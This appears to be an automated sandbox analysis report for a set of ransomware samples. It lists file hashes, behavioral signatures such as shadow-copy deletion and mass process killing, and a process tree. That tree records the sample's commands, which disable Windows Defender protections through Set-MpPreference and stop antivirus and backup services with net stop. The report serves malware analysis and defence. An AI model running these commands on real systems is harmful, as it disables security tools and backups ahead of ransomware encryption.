Overview
overview
10Static
static
100361e25d7f...le.exe
windows7_x64
100361e25d7f...le.exe
windows10_x64
10121c11c405...le.exe
windows7_x64
9121c11c405...le.exe
windows10_x64
916e6e08c37...le.exe
windows7_x64
916e6e08c37...le.exe
windows10_x64
91d4db8733c...le.exe
windows7_x64
101d4db8733c...le.exe
windows10_x64
101e189b1013...le.exe
windows7_x64
101e189b1013...le.exe
windows10_x64
102033194ab3...le.exe
windows7_x64
102033194ab3...le.exe
windows10_x64
821dd66ef4b...le.exe
windows7_x64
1021dd66ef4b...le.exe
windows10_x64
102d3d1b8306...le.exe
windows7_x64
82d3d1b8306...le.exe
windows10_x64
847b51b615f...le.exe
windows7_x64
1047b51b615f...le.exe
windows10_x64
84fefb51009...le.exe
windows7_x64
104fefb51009...le.exe
windows10_x64
105026eddb6f...le.exe
windows7_x64
105026eddb6f...le.exe
windows10_x64
1050ece411c1...le.exe
windows7_x64
1050ece411c1...le.exe
windows10_x64
10551129c0d4...le.exe
windows7_x64
551129c0d4...le.exe
windows10_x64
1058bfb9fa88...le.exe
windows7_x64
58bfb9fa88...le.exe
windows10_x64
105e088eb0eb...le.exe
windows7_x64
105e088eb0eb...le.exe
windows10_x64
105e998fa65c...le.exe
windows7_x64
105e998fa65c...le.exe
windows10_x64
10Analysis
-
max time kernel
7s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
Static task
static1
Behavioral task
behavioral1
Sample
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral30
Sample
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Resource
win10v20210408
General
-
Target
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
-
Size
82KB
-
MD5
fe68d6631a5ed731e065858e78809da6
-
SHA1
2feb2430217ea991d6f034ed9e253e35b3bebc88
-
SHA256
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514
-
SHA512
299863ee06b0803b6bc6385d964d464ca7393d8ff7445d9ce6ccf3aadf11ab1e6a0178931b2bfcefae5185d54205c712e867c4e2f88b22d3757c95100f7a2f62
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 9 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 6016 icacls.exe 3432 icacls.exe 6000 icacls.exe 5296 icacls.exe 6008 icacls.exe 5716 icacls.exe 4224 icacls.exe 4744 icacls.exe 2584 icacls.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 5884 vssadmin.exe 3808 vssadmin.exe 5544 vssadmin.exe 5320 vssadmin.exe 3368 vssadmin.exe 5828 vssadmin.exe 5256 vssadmin.exe 5384 vssadmin.exe 5600 vssadmin.exe 5220 vssadmin.exe 5460 vssadmin.exe 5404 vssadmin.exe 6136 vssadmin.exe 5044 vssadmin.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5956 taskkill.exe 2044 taskkill.exe 2292 taskkill.exe 5348 taskkill.exe 4272 taskkill.exe 4900 taskkill.exe 1736 taskkill.exe 5048 taskkill.exe 4364 taskkill.exe 4552 taskkill.exe 1972 taskkill.exe 1732 taskkill.exe 4720 taskkill.exe 5936 taskkill.exe 5772 taskkill.exe 5924 taskkill.exe 276 taskkill.exe 5860 taskkill.exe 2224 taskkill.exe 4920 taskkill.exe 5748 taskkill.exe 3988 taskkill.exe 4940 taskkill.exe 5728 taskkill.exe 4560 taskkill.exe 680 taskkill.exe 808 taskkill.exe 4416 taskkill.exe 4848 taskkill.exe 4204 taskkill.exe 2832 taskkill.exe 5436 taskkill.exe 4740 taskkill.exe 3552 taskkill.exe 4296 taskkill.exe 1740 taskkill.exe 4672 taskkill.exe 4572 taskkill.exe 5500 taskkill.exe 4500 taskkill.exe 5148 taskkill.exe 5796 taskkill.exe 5628 taskkill.exe 6008 taskkill.exe 4184 taskkill.exe 5492 taskkill.exe 1280 taskkill.exe 6116 taskkill.exe 5332 taskkill.exe 5556 taskkill.exe 5652 taskkill.exe 5764 taskkill.exe 5080 taskkill.exe 2808 taskkill.exe 1236 taskkill.exe 4244 taskkill.exe 4224 taskkill.exe 4544 taskkill.exe 4612 taskkill.exe 2264 taskkill.exe 5748 taskkill.exe 2288 taskkill.exe 4264 taskkill.exe 296 taskkill.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exepowershell.exepid process 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1968 powershell.exe 1968 powershell.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1968 powershell.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exenetsh.exenet.exepowershell.exenet.exedescription pid process Token: SeDebugPrivilege 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeIncreaseQuotaPrivilege 1968 powershell.exe Token: SeSecurityPrivilege 1968 powershell.exe Token: SeTakeOwnershipPrivilege 1968 powershell.exe Token: SeLoadDriverPrivilege 1968 powershell.exe Token: SeSystemProfilePrivilege 1968 powershell.exe Token: SeSystemtimePrivilege 1968 powershell.exe Token: SeProfSingleProcessPrivilege 1968 powershell.exe Token: SeIncBasePriorityPrivilege 1968 powershell.exe Token: SeCreatePagefilePrivilege 1968 powershell.exe Token: SeBackupPrivilege 1968 powershell.exe Token: SeRestorePrivilege 1968 powershell.exe Token: SeShutdownPrivilege 1968 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeSystemEnvironmentPrivilege 1968 powershell.exe Token: SeRemoteShutdownPrivilege 1968 powershell.exe Token: SeUndockPrivilege 1968 powershell.exe Token: SeManageVolumePrivilege 1968 powershell.exe Token: 33 1968 powershell.exe Token: 34 1968 powershell.exe Token: 35 1968 powershell.exe Token: 36 1968 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeDebugPrivilege 2404 powershell.exe Token: SeDebugPrivilege 2112 netsh.exe Token: SeDebugPrivilege 3408 Token: SeDebugPrivilege 4120 net.exe Token: SeDebugPrivilege 4228 Token: SeDebugPrivilege 4336 powershell.exe Token: SeDebugPrivilege 4476 net.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exedescription pid process target process PID 1016 wrote to memory of 1968 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 1968 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 1312 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 1312 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 2404 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 2404 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 3968 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 3968 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 3408 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 3408 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 2112 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 2112 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4120 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4120 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4228 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4228 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4336 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4336 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4476 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4476 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4592 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4592 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4728 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4728 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe powershell.exe PID 1016 wrote to memory of 4844 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net1.exe PID 1016 wrote to memory of 4844 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net1.exe PID 1016 wrote to memory of 4884 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net.exe PID 1016 wrote to memory of 4884 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net.exe PID 1016 wrote to memory of 4932 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe Conhost.exe PID 1016 wrote to memory of 4932 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe Conhost.exe PID 1016 wrote to memory of 4968 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net.exe PID 1016 wrote to memory of 4968 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net.exe PID 1016 wrote to memory of 5020 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe taskkill.exe PID 1016 wrote to memory of 5020 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe taskkill.exe PID 1016 wrote to memory of 5092 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net.exe PID 1016 wrote to memory of 5092 1016 1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵PID:3408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵PID:4120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵PID:4228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵PID:4728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵PID:4844
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵PID:4884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:5136
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:5228
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵PID:4968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:5240
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:5504
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:5020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:5324
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:5092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:5348
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:5512
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5756
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:5204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:5912
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:5152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5816
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:5640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:5852
-
-
-
